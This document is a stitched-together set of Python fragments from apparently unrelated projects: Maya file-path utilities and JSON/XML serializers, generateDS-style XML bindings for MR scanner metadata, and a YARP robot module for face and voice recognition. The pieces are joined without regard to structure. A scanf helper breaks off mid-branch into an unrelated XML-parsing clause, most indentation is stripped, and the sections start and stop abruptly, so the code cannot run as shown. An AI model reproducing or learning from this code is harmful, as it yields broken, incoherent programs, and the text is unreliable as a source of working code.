if not is_file(file_path):
f_ptr = open(file_path, 'w')
f_ptr.close()
return file_path
def remove_directory(dir_name):
"""
removes directory from path.
:param dir_name: <str> directory name.
:return: <bool> True for success.
:raises: <OSError> invalid directory path.
"""
os.rmdir(dir_name)
return True
def get_files(path_name, file_ext='json'):
"""
get the list of files in the path name
:param path_name: <str> file path name to search.
:param file_ext: <str> file extension to filter by.
:return: <list> array of files found.
"""
return glob.glob(path_name + '/*{}'.format(file_ext))
def get_directories(path_name, full_path=False):
"""
get directories found in this path name.
:param path_name: <str> use this path to get the files from.
:param full_path: <bool> returns the full path of the directory path.
:return: <tuple> files found.
"""
files = tuple(glob.glob(path_name + '/*'))
if full_path:
return files
else:
return tuple(map(lambda x: os.path.split(x)[-1], files))
def build_dir(dir_name):
"""
creates the directory path.
:param dir_name: <str> directory name to create.
:return: <str> directory name is successful. <bool> False if invalid directory path is given.
"""
if is_file(dir_name):
return False
if not is_dir(dir_name):
os.mkdir(dir_name)
return dir_name
def get_path(*args):
"""
construct a path from arguments provided.
:param args: <tuple> array of arguments to concatenate.
:return: <str> path
"""
return posixpath.join(*args)
def get_maya_workspace_dir():
"""
get the current working directory path for the maya project
:return: <str> path
"""
return cmds.workspace(dir=True, q=1)
def get_maya_workspace_data_dir():
"""
returns the data directory in the workspace directory.
:return: <str> data workspace directory.
"""
data_dir = get_maya_workspace_dir()
if 'data' not in data_dir:
data_dir = concatenate_path(get_maya_workspace_dir(), 'data')
build_dir(data_dir)
return data_dir
def has_ext(file_name, ext_name=""):
"""
check if the file name string has the extension name.
:param file_name: <str> file name to check.
:param ext_name: <str> check this extension string name.
:return: <bool> True for yes. <bool> False for no.
"""
name, ext = os.path.splitext(file_name)
if ext_name and ext.lstrip('.') != ext_name.lstrip('.'):  # normalize so has_ext(name, 'json') matches '.json'
return False
elif not ext:
return False
return True
def add_extension(file_name, ext_name=""):
"""
add this extension name to the file name variable.
:param file_name: <str> the file name to add the extension to.
:param ext_name: <str> the extension string name to add to the file name.
:return: <str> file name with extension string.
"""
name, ext = os.path.splitext(file_name)
return name + '.{}'.format(ext_name.strip('.'))
def is_file(file_name):
"""
checks if the file name is valid.
:param file_name: <str> check this file name for validity.
:return: <bool> True for success. <bool> False for failure.
"""
return os.path.isfile(file_name)
def is_dir(file_name):
"""
checks if the directory name is valid.
:param file_name: <str> check this directory name for validity.
:return: <bool> True for success. <bool> False for failure.
"""
return os.path.isdir(file_name)
def open_current_file():
"""
Opens the current maya scene file.
:return: <bool> True for success.
"""
cmds.file(cmds.file(q=1, loc=1), o=1, f=1)
return True
def split_file_ext(file_name):
"""
splits the extension from the file name.
:param file_name:
:return:
"""
return os.path.splitext(file_name)[1]
def split_file_name(file_name):
"""
splits the name from the file name.
:param file_name:
:return:
"""
return os.path.splitext(file_name)[0]
def get_file_splits(file_name):
"""
split the current file string.
:return: <tuple> array of file directory file names.
"""
return tuple(filter(lambda x: x not in ('', '/', '\\'), re_slash.split(file_name)))
def get_this_directory():
"""
return this directory path.
:return:
"""
return '/'.join(get_file_splits(__file__)[:-1])
def _parent_level(level):
"""
negates the level so it can be used as a negative slice index.
:param level:
:return:
"""
return -level
def get_this_directory_parent(level=1):
"""
get the directory parent path from level.
:return: <str> get the file path string.
"""
if level == 0:
raise IOError("[GetThisDirectoryParent] :: This cannot equal to zero.")
return '/'.join(get_file_splits(__file__)[:_parent_level(level)])
def directory_name(file_name):
"""
return the directory name from the file name.
:param file_name:
:return:
"""
return os.path.dirname(file_name)
def controller_data_dir():
"""
gets the relative path for the controller data folder directory.
:return: <str> directory path name.
"""
dir_name = get_this_directory_parent(level=2)
return posixpath.join(dir_name, 'rig_utils', 'controller_data')
def list_files(file_name):
"""
lists files in a file path given.
:param file_name:
:return: <tuple> array of available files.
"""
if is_file(file_name):
return tuple(os.listdir(directory_name(file_name)))
return tuple(os.listdir(file_name))
def list_controller_files():
"""
lists all the files in the controller directory
:return: <tuple> array of available controller files.
"""
return list_files(controller_data_dir())
def concatenate_path(*args):
"""
concatenate the strings into one path.
:param args:
:return: <str> directory file path name.
"""
return posixpath.join(*args)
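def _example_path_usage():
    """
    usage sketch for the helpers above (illustrative only; the 'example'
    module name is made up). creates a .py file in the Maya project's data
    directory and lists the json files beside it.
    :return: <tuple> created file path and the json files found.
    """
    data_dir = get_maya_workspace_data_dir()
    new_file = make_py_file(data_dir, 'example')
    return new_file, get_files(data_dir)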
class JSONSerializer:
"""
json serializer data class in case we want to manipulate json data.
"""
READ_DATA = {}
FILE_NAME = ""
INCOMING_DATA = {}
EXT_NAME = "json"
def __init__(self, file_name="", data={}):
self._get_data(data)
self._get_file_name(file_name)
if not self.is_directory_valid:
raise IOError('Invalid directory: {}'.format(self.FILE_NAME))
def _get_file_name(self, file_name):
"""
checks which incoming file name to use.
:param file_name: <str> the incoming file name to check.
:return: <str> file name.
"""
if not file_name:
return self.FILE_NAME
else:
if not has_ext(file_name, 'json'):
file_name = add_extension(file_name, self.EXT_NAME)
self._update_file_name_variable(file_name)
return file_name
def _get_data(self, data):
"""
checks which incoming data to use.
:param data: <dict> the incoming data.
:return: <dict> data.
"""
if not data:
return self.INCOMING_DATA
else:
self._update_data_variable(data)
return data
def _update_file_name_variable(self, file_name):
"""
updates the file name class variable.
:return: <bool> True for success.
"""
self.FILE_NAME = file_name
return self.FILE_NAME == file_name
def _update_data_variable(self, data):
"""
updates the data class variable.
:param data: <dict> the data object to store.
:return: <bool> True for success.
"""
self.INCOMING_DATA = data
return self.INCOMING_DATA == data
def write(self, file_name="", data={}):
"""
write the JSON data.
:param file_name: <str> the file name string to write files to.
:param data: <dict> the data dictionary to write.
:return: <bool> True for success. <bool> False for failure.
"""
with open(self._get_file_name(file_name), "w") as write_file:
# now write the file from the start
write_file.seek(0)
# then write the file
json.dump(self._get_data(data), write_file, indent=4, sort_keys=True)
def read(self, file_name=""):
"""
read the JSON data.
:param file_name: <str> the file name string to read from.
:return: <dict> the de-serialized JSON data.
"""
with open(self._get_file_name(file_name), "r") as read_file:
return json.load(read_file)
@property
def read_data(self):
return self.read()
@property
def file_name(self):
return self.FILE_NAME
@property
def is_directory_valid(self):
if has_ext(self.FILE_NAME):
return is_dir(directory_name(self.FILE_NAME))
return is_dir(self.FILE_NAME)
@property
def is_file_valid(self):
return is_file(self.FILE_NAME)
@property
def is_data_valid(self):
return isinstance(self.READ_DATA, dict)
@property
def has_data(self):
return bool(self.READ_DATA)
def delete(self):
if self.is_file_valid:
remove_file(self.FILE_NAME)
def file(self):
return self._get_file_name()
def __repr__(self):
return self.FILE_NAME
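def _example_json_roundtrip():
    """
    usage sketch for JSONSerializer (illustrative only; the file name and the
    data are made up). the '.json' extension is appended automatically.
    :return: <dict> the data read back from disk.
    """
    serializer = JSONSerializer(
        file_name=concatenate_path(get_maya_workspace_data_dir(), 'example_data'),
        data={'key': 'value'})
    serializer.write()
    return serializer.read()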
class XMLSerializer:
def __init__(self):
self.READ_DATA = {}
self.xml_data = None
def interpret_dictionary_data(self, dictionary_data=None):
"""
re-interpret the dictionary data as XML element trees.
:return: <xml.Element> data.
"""
if not isinstance(dictionary_data, dict):
raise ValueError("[InterpretDictionaryData] :: Must have a dictionary type as input parameter.")
self.xml_data = ET.Element("DataInformation")
items = ET.SubElement(self.xml_data, 'Data')
for k_item, k_value in dictionary_data.items():
item = ET.SubElement(items, k_item)
if not isinstance(k_value, dict):
ET.SubElement(item, k_value)
else:
for k_name, v_items in k_value.items():
array_key = ET.SubElement(item, k_name)
if isinstance(v_items, str):
ET.SubElement(array_key, v_items)
elif isinstance(v_items, (tuple, list)):
for it_name in v_items:
ET.SubElement(array_key, str(it_name))
elif isinstance(v_items, dict):
for it_name, it_val in v_items.items():
it_elem = ET.SubElement(array_key, str(it_name))
ET.SubElement(it_elem, str(it_val))
return self.xml_data  # ET.dump() only prints and returns None; return the tree as documented
def write(self, file_name, dictionary_data):
"""
write the XML data as string data.
:return: <bool> True for success.
"""
# collect the data
self.interpret_dictionary_data(dictionary_data)
tree = ET.ElementTree(self.xml_data)
tree.write(file_name)
return True
def read(self, file_name):
"""
read the XML data file
:return: <data> information.
"""
tree = ET.parse(file_name)
root = tree.getroot()
for elem in root:
for sub_elem in elem:
self.update_read_data(sub_elem.tag, sub_elem.text)  # use the tag; attrib is a dict and cannot be a dictionary key
def update_read_data(self, key_name, value):
"""
updates the read dictionary data.
:param key_name:
:param value:
:return:
"""
if key_name not in self.READ_DATA:
self.READ_DATA[key_name] = value
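def _example_xml_roundtrip():
    """
    usage sketch for XMLSerializer (illustrative only; the file name and the
    data are made up). writes nested dictionary data as XML, then reads it
    back into READ_DATA keyed by element tag.
    :return: <dict> the gathered READ_DATA.
    """
    serializer = XMLSerializer()
    serializer.write('example_data.xml', {'settings': {'name': 'demo'}})
    serializer.read('example_data.xml')
    return serializer.READ_DATA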
def scanf(file_name, token):
"""
returns scanf functionality using regex.
:return: <regex>
"""
if token == '%c':
re_compiled = re.compile('.', re.DOTALL)
elif token == '%5c':
re_compiled = re.compile('.{5}')
elif token == '%d':
re_compiled = re.compile(r'[-+]?\d+')
elif token in ('%e', '%E', '%f', '%g'):
re_compiled = re.compile(r'[-+]?(\d+(\.\d*)?|\.\d+)([eE][-+]?\d+)?')
elif token == '%i':
re_compiled = re.compile(r'[-+]?(0[xX][\dA-Fa-f]+|0[0-7]*|\d+)')
elif token == '%o':
re_compiled = re.compile('[-+]?[0-7]+')
elif nodeName_ == 'measurementID':
measurementID_ = child_.text
measurementID_ = self.gds_validate_string(measurementID_, node, 'measurementID')
self.measurementID = measurementID_
# end class measurementDependencyType
class coilLabelType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, coilNumber=None, coilName=None):
self.original_tagname_ = None
self.coilNumber = coilNumber
self.coilName = coilName
def factory(*args_, **kwargs_):
if coilLabelType.subclass:
return coilLabelType.subclass(*args_, **kwargs_)
else:
return coilLabelType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_coilNumber(self): return self.coilNumber
def set_coilNumber(self, coilNumber): self.coilNumber = coilNumber
def get_coilName(self): return self.coilName
def set_coilName(self, coilName): self.coilName = coilName
def hasContent_(self):
if (
self.coilNumber is not None or
self.coilName is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='', name_='coilLabelType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='coilLabelType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='', name_='coilLabelType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='coilLabelType'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='coilLabelType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.coilNumber is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%scoilNumber>%s</%scoilNumber>%s' % (namespace_, self.gds_format_integer(self.coilNumber, input_name='coilNumber'), namespace_, eol_))
if self.coilName is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%scoilName>%s</%scoilName>%s' % (namespace_, self.gds_format_string(quote_xml(self.coilName).encode(ExternalEncoding), input_name='coilName'), namespace_, eol_))
def exportLiteral(self, outfile, level, name_='coilLabelType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.coilNumber is not None:
showIndent(outfile, level)
outfile.write('coilNumber=%d,\n' % self.coilNumber)
if self.coilName is not None:
showIndent(outfile, level)
outfile.write('coilName=%s,\n' % quote_python(self.coilName).encode(ExternalEncoding))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'coilNumber':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'coilNumber')
self.coilNumber = ival_
elif nodeName_ == 'coilName':
coilName_ = child_.text
coilName_ = self.gds_validate_string(coilName_, node, 'coilName')
self.coilName = coilName_
# end class coilLabelType
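# Usage sketch for the generated binding above (illustrative only; the values
# are made up). generateDS-style export takes an output stream and an indent
# level:
#
#   import sys
#   label = coilLabelType(coilNumber=1, coilName='HeadCoil_1')
#   label.export(sys.stdout, 0)
#   # -> <coilLabelType><coilNumber>1</coilNumber><coilName>HeadCoil_1</coilName></coilLabelType>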
class acquisitionSystemInformationType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, systemVendor=None, systemModel=None, systemFieldStrength_T=None, relativeReceiverNoiseBandwidth=None, receiverChannels=None, coilLabel=None, institutionName=None, stationName=None):
self.original_tagname_ = None
self.systemVendor = systemVendor
self.systemModel = systemModel
self.systemFieldStrength_T = systemFieldStrength_T
self.relativeReceiverNoiseBandwidth = relativeReceiverNoiseBandwidth
self.receiverChannels = receiverChannels
if coilLabel is None:
self.coilLabel = []
else:
self.coilLabel = coilLabel
self.institutionName = institutionName
self.stationName = stationName
def factory(*args_, **kwargs_):
if acquisitionSystemInformationType.subclass:
return acquisitionSystemInformationType.subclass(*args_, **kwargs_)
else:
return acquisitionSystemInformationType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_systemVendor(self): return self.systemVendor
def set_systemVendor(self, systemVendor): self.systemVendor = systemVendor
def get_systemModel(self): return self.systemModel
def set_systemModel(self, systemModel): self.systemModel = systemModel
def get_systemFieldStrength_T(self): return self.systemFieldStrength_T
def set_systemFieldStrength_T(self, systemFieldStrength_T): self.systemFieldStrength_T = systemFieldStrength_T
def get_relativeReceiverNoiseBandwidth(self): return self.relativeReceiverNoiseBandwidth
def set_relativeReceiverNoiseBandwidth(self, relativeReceiverNoiseBandwidth): self.relativeReceiverNoiseBandwidth = relativeReceiverNoiseBandwidth
def get_receiverChannels(self): return self.receiverChannels
def set_receiverChannels(self, receiverChannels): self.receiverChannels = receiverChannels
def get_coilLabel(self): return self.coilLabel
def set_coilLabel(self, coilLabel): self.coilLabel = coilLabel
def add_coilLabel(self, value): self.coilLabel.append(value)
def insert_coilLabel_at(self, index, value): self.coilLabel.insert(index, value)
def replace_coilLabel_at(self, index, value): self.coilLabel[index] = value
def get_institutionName(self): return self.institutionName
def set_institutionName(self, institutionName): self.institutionName = institutionName
def get_stationName(self): return self.stationName
def set_stationName(self, stationName): self.stationName = stationName
def hasContent_(self):
if (
self.systemVendor is not None or
self.systemModel is not None or
self.systemFieldStrength_T is not None or
self.relativeReceiverNoiseBandwidth is not None or
self.receiverChannels is not None or
self.coilLabel or
self.institutionName is not None or
self.stationName is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='', name_='acquisitionSystemInformationType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='acquisitionSystemInformationType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='', name_='acquisitionSystemInformationType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='acquisitionSystemInformationType'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='acquisitionSystemInformationType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.systemVendor is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%ssystemVendor>%s</%ssystemVendor>%s' % (namespace_, self.gds_format_string(quote_xml(self.systemVendor).encode(ExternalEncoding), input_name='systemVendor'), namespace_, eol_))
if self.systemModel is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%ssystemModel>%s</%ssystemModel>%s' % (namespace_, self.gds_format_string(quote_xml(self.systemModel).encode(ExternalEncoding), input_name='systemModel'), namespace_, eol_))
if self.systemFieldStrength_T is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%ssystemFieldStrength_T>%s</%ssystemFieldStrength_T>%s' % (namespace_, self.gds_format_float(self.systemFieldStrength_T, input_name='systemFieldStrength_T'), namespace_, eol_))
if self.relativeReceiverNoiseBandwidth is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%srelativeReceiverNoiseBandwidth>%s</%srelativeReceiverNoiseBandwidth>%s' % (namespace_, self.gds_format_float(self.relativeReceiverNoiseBandwidth, input_name='relativeReceiverNoiseBandwidth'), namespace_, eol_))
if self.receiverChannels is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sreceiverChannels>%s</%sreceiverChannels>%s' % (namespace_, self.gds_format_integer(self.receiverChannels, input_name='receiverChannels'), namespace_, eol_))
for coilLabel_ in self.coilLabel:
coilLabel_.export(outfile, level, namespace_, name_='coilLabel', pretty_print=pretty_print)
if self.institutionName is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sinstitutionName>%s</%sinstitutionName>%s' % (namespace_, self.gds_format_string(quote_xml(self.institutionName).encode(ExternalEncoding), input_name='institutionName'), namespace_, eol_))
if self.stationName is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sstationName>%s</%sstationName>%s' % (namespace_, self.gds_format_string(quote_xml(self.stationName).encode(ExternalEncoding), input_name='stationName'), namespace_, eol_))
def exportLiteral(self, outfile, level, name_='acquisitionSystemInformationType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.systemVendor is not None:
showIndent(outfile, level)
outfile.write('systemVendor=%s,\n' % quote_python(self.systemVendor).encode(ExternalEncoding))
if self.systemModel is not None:
showIndent(outfile, level)
outfile.write('systemModel=%s,\n' % quote_python(self.systemModel).encode(ExternalEncoding))
if self.systemFieldStrength_T is not None:
showIndent(outfile, level)
outfile.write('systemFieldStrength_T=%f,\n' % self.systemFieldStrength_T)
if self.relativeReceiverNoiseBandwidth is not None:
showIndent(outfile, level)
outfile.write('relativeReceiverNoiseBandwidth=%f,\n' % self.relativeReceiverNoiseBandwidth)
if self.receiverChannels is not None:
showIndent(outfile, level)
outfile.write('receiverChannels=%d,\n' % self.receiverChannels)
showIndent(outfile, level)
outfile.write('coilLabel=[\n')
level += 1
for coilLabel_ in self.coilLabel:
showIndent(outfile, level)
outfile.write('model_.coilLabelType(\n')
coilLabel_.exportLiteral(outfile, level, name_='coilLabelType')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
if self.institutionName is not None:
showIndent(outfile, level)
outfile.write('institutionName=%s,\n' % quote_python(self.institutionName).encode(ExternalEncoding))
if self.stationName is not None:
showIndent(outfile, level)
outfile.write('stationName=%s,\n' % quote_python(self.stationName).encode(ExternalEncoding))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'systemVendor':
systemVendor_ = child_.text
systemVendor_ = self.gds_validate_string(systemVendor_, node, 'systemVendor')
self.systemVendor = systemVendor_
elif nodeName_ == 'systemModel':
systemModel_ = child_.text
systemModel_ = self.gds_validate_string(systemModel_, node, 'systemModel')
self.systemModel = systemModel_
elif nodeName_ == 'systemFieldStrength_T':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'systemFieldStrength_T')
self.systemFieldStrength_T = fval_
elif nodeName_ == 'relativeReceiverNoiseBandwidth':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'relativeReceiverNoiseBandwidth')
self.relativeReceiverNoiseBandwidth = fval_
elif nodeName_ == 'receiverChannels':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'receiverChannels')
self.receiverChannels = ival_
elif nodeName_ == 'coilLabel':
obj_ = coilLabelType.factory()
obj_.build(child_)
self.coilLabel.append(obj_)
obj_.original_tagname_ = 'coilLabel'
elif nodeName_ == 'institutionName':
institutionName_ = child_.text
institutionName_ = self.gds_validate_string(institutionName_, node, 'institutionName')
self.institutionName = institutionName_
elif nodeName_ == 'stationName':
stationName_ = child_.text
stationName_ = self.gds_validate_string(stationName_, node, 'stationName')
self.stationName = stationName_
# end class acquisitionSystemInformationType
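# Usage sketch (not part of the generated bindings): round-tripping an
# acquisitionSystemInformation element through build()/export(). It assumes the
# generateDS runtime helpers referenced above (GeneratedsSuper, Tag_pattern_,
# showIndent, quote_xml, ExternalEncoding, ...) are defined earlier in this
# module; the element and field values are illustrative only.
#
#     import sys
#     from xml.etree import ElementTree as etree
#
#     fragment = (
#         '<acquisitionSystemInformation>'
#         '<systemVendor>ExampleVendor</systemVendor>'
#         '<systemFieldStrength_T>2.89</systemFieldStrength_T>'
#         '<receiverChannels>32</receiverChannels>'
#         '</acquisitionSystemInformation>'
#     )
#     info = acquisitionSystemInformationType.factory()
#     info.build(etree.fromstring(fragment))
#     info.export(sys.stdout, level=0, name_='acquisitionSystemInformation')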
class experimentalConditionsType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, H1resonanceFrequency_Hz=None):
self.original_tagname_ = None
self.H1resonanceFrequency_Hz = H1resonanceFrequency_Hz
def factory(*args_, **kwargs_):
if experimentalConditionsType.subclass:
return experimentalConditionsType.subclass(*args_, **kwargs_)
else:
return experimentalConditionsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_H1resonanceFrequency_Hz(self): return self.H1resonanceFrequency_Hz
def set_H1resonanceFrequency_Hz(self, H1resonanceFrequency_Hz): self.H1resonanceFrequency_Hz = H1resonanceFrequency_Hz
def hasContent_(self):
if (
self.H1resonanceFrequency_Hz is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='', name_='experimentalConditionsType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='experimentalConditionsType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='', name_='experimentalConditionsType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='experimentalConditionsType'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='experimentalConditionsType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.H1resonanceFrequency_Hz is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sH1resonanceFrequency_Hz>%s</%sH1resonanceFrequency_Hz>%s' % (namespace_, self.gds_format_integer(self.H1resonanceFrequency_Hz, input_name='H1resonanceFrequency_Hz'), namespace_, eol_))
    def exportLiteral(self, outfile, level, name_='experimentalConditionsType'):
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
import sys
import os
import time
from torchvision import transforms
import torch, torchaudio
import yarp
import numpy as np
from speechbrain.pretrained import EncoderClassifier
from project.voiceRecognition.speaker_embeddings import EmbeddingsHandler
from project.faceRecognition.utils import format_face_coord, face_alignement, format_names_to_bottle, \
fixed_image_standardization, get_center_face
from project.AVRecognition.lit_AVperson_classifier import LitSpeakerClassifier, Backbone
from project.yarpModules.DatabaseHandler import DatabaseHandler
import scipy.io.wavfile as wavfile
import scipy
import dlib
import cv2 as cv
def info(msg):
print("[INFO] {}".format(msg))
class PersonsRecognition(yarp.RFModule):
"""
Description:
Class to recognize a person from the audio or the face
Args:
input_port : Audio from remoteInterface, raw image from iCub cameras
"""
def __init__(self):
yarp.RFModule.__init__(self)
# handle port for the RFModule
self.module_name = None
self.handle_port = None
self.process = False
# Define vars to receive audio
self.audio_in_port = None
self.eventPort = None
self.is_voice = False
# Predictions parameters
self.label_outputPort = None
self.predictions = []
self.database = None
# Speaker module parameters
self.model_audio = None
self.dataset_path = None
self.db_embeddings_audio = None
self.threshold_audio = None
self.length_input = None
self.resample_trans = None
self.speaker_emb = []
# Parameters for the audio
self.sound = None
self.audio = []
self.np_audio = None
self.nb_samples_received = 0
self.sampling_rate = None
# Define port to receive an Image
self.image_in_port = yarp.BufferedPortImageRgb()
self.face_coord_port = yarp.BufferedPortBottle()
# Port to query and update the memory (OPC)
self.opc_port = yarp.RpcClient()
# Image parameters
self.width_img = None
self.height_img = None
self.input_img_array = None
self.frame = None
self.coord_face = None
self.threshold_face = None
self.face_emb = []
        # Model for face recognition
self.modele_face = None
self.db_embeddings_face = None
self.trans = None
self.faces_img = []
self.face_coord_request = None
self.face_model_path = None
        # Model for cross-modal recognition
self.model_av = None
self.sm = torch.nn.Softmax(dim=1)
self.threshold_multimodal = None
self.device = None
self.save_face = False
self.name = ""
self.predict = False
def configure(self, rf):
success = True
# handle port for the RFModule
self.handle_port = yarp.Port()
self.attach(self.handle_port)
# Define vars to receive audio
self.audio_in_port = yarp.BufferedPortSound()
self.label_outputPort = yarp.Port()
self.eventPort = yarp.BufferedPortBottle()
# Module parameters
self.module_name = rf.check("name",
yarp.Value("PersonRecognition"),
"module name (string)").asString()
self.handle_port.open('/' + self.module_name)
self.dataset_path = rf.check("dataset_path",
yarp.Value(
""),
"Root path of the embeddings database (voice & face) (string)").asString()
self.database = DatabaseHandler(self.dataset_path)
self.length_input = rf.check("length_input",
yarp.Value(1),
"length audio input in seconds (int)").asInt()
self.threshold_audio = rf.check("threshold_audio",
yarp.Value(0.32),
"threshold_audio for detection (double)").asDouble()
self.threshold_face = rf.check("threshold_face",
yarp.Value(0.55),
"threshold_face for detection (double)").asDouble()
self.face_model_path = rf.check("face_model_path",
yarp.Value(""),
"Path of the model for face embeddings (string)").asString()
# Set the device for inference for the models
self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print('Running on device: {}'.format(self.device))
success &= self.load_model_face()
self.sampling_rate = rf.check("fs",
yarp.Value(48000),
" Sampling rate of the incoming audio signal (int)").asInt()
success &= self.load_model_audio()
# Audio and voice events
self.audio_in_port.open('/' + self.module_name + '/audio:i')
self.eventPort.open('/' + self.module_name + '/events:i')
# Label
self.label_outputPort.open('/' + self.module_name + '/label:o')
# Image and face
self.width_img = rf.check('width', yarp.Value(320),
'Width of the input image').asInt()
self.height_img = rf.check('height', yarp.Value(244),
'Height of the input image').asInt()
self.face_coord_port.open('/' + self.module_name + '/coord:i')
self.face_coord_port.setStrict(False)
self.image_in_port.open('/' + self.module_name + '/image:i')
self.input_img_array = np.zeros((self.height_img, self.width_img, 3), dtype=np.uint8).tobytes()
self.opc_port.open('/' + self.module_name + '/OPC:rpc')
self.threshold_multimodal = 0.8
info("Initialization complete")
return success
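    # Launch sketch (assumption, not part of this module): an instance is
    # normally driven through the standard yarp.RFModule life cycle, with a
    # YARP name server reachable on the network:
    #
    #     yarp.Network.init()
    #     rf = yarp.ResourceFinder()
    #     rf.configure(sys.argv)
    #     module = PersonsRecognition()
    #     module.runModule(rf)  # calls configure(), then updateModule() every getPeriod() seconds
    #     yarp.Network.fini()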
def load_model_audio(self):
self.resample_trans = torchaudio.transforms.Resample(self.sampling_rate, 16000)
# Load Database for audio embeddings
try:
self.db_embeddings_audio = EmbeddingsHandler(os.path.join(self.dataset_path, "audio"), n_neighbors=4)
self.model_audio = EncoderClassifier.from_hparams(source="speechbrain/spkrec-ecapa-voxceleb")
except FileNotFoundError:
info(f"Unable to find dataset {EmbeddingsHandler(os.path.join(self.dataset_path, 'audio'))}")
return False
return True
def load_model_face(self):
try:
self.modele_face = torch.load(self.face_model_path)
self.modele_face.eval()
self.db_embeddings_face = EmbeddingsHandler(os.path.join(self.dataset_path, "face"), threshold=self.threshold_face)
# Transform for face embeddings
self.trans = transforms.Compose([
np.float32,
transforms.ToTensor(),
fixed_image_standardization,
transforms.Resize((180, 180))
])
except FileNotFoundError:
